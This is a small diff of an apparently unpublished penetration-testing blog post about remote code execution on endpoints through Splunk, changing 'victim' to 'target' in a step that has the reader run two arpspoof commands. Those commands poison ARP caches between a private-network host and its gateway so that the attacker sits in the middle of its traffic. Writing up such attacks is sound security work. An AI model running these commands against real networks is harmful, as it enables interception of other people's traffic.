chryzsh/chryzsh.github.io/notpublished/2019-10-02-rce-on-endpoints-splunk-magic.md

 ![](../assets/img/splunk-rce/2019-10-03-01-01-39.png)

-Open two terminals and execute `arpspoof` to tell the victim that we are the default gateway and the gateway that we are the victim.
-This way, all traffic to and from the victim will be forwarded through our attacker host.
+Open two terminals and execute `arpspoof` to tell the target that we are the default gateway and the gateway that we are the target.
+This way, all traffic to and from the target will be forwarded through our attacker host.

     arpspoof -i eth0 -t 192.168.0.134 192.168.0.1
     arpspoof -i eth0 -t 192.168.0.1 192.168.0.134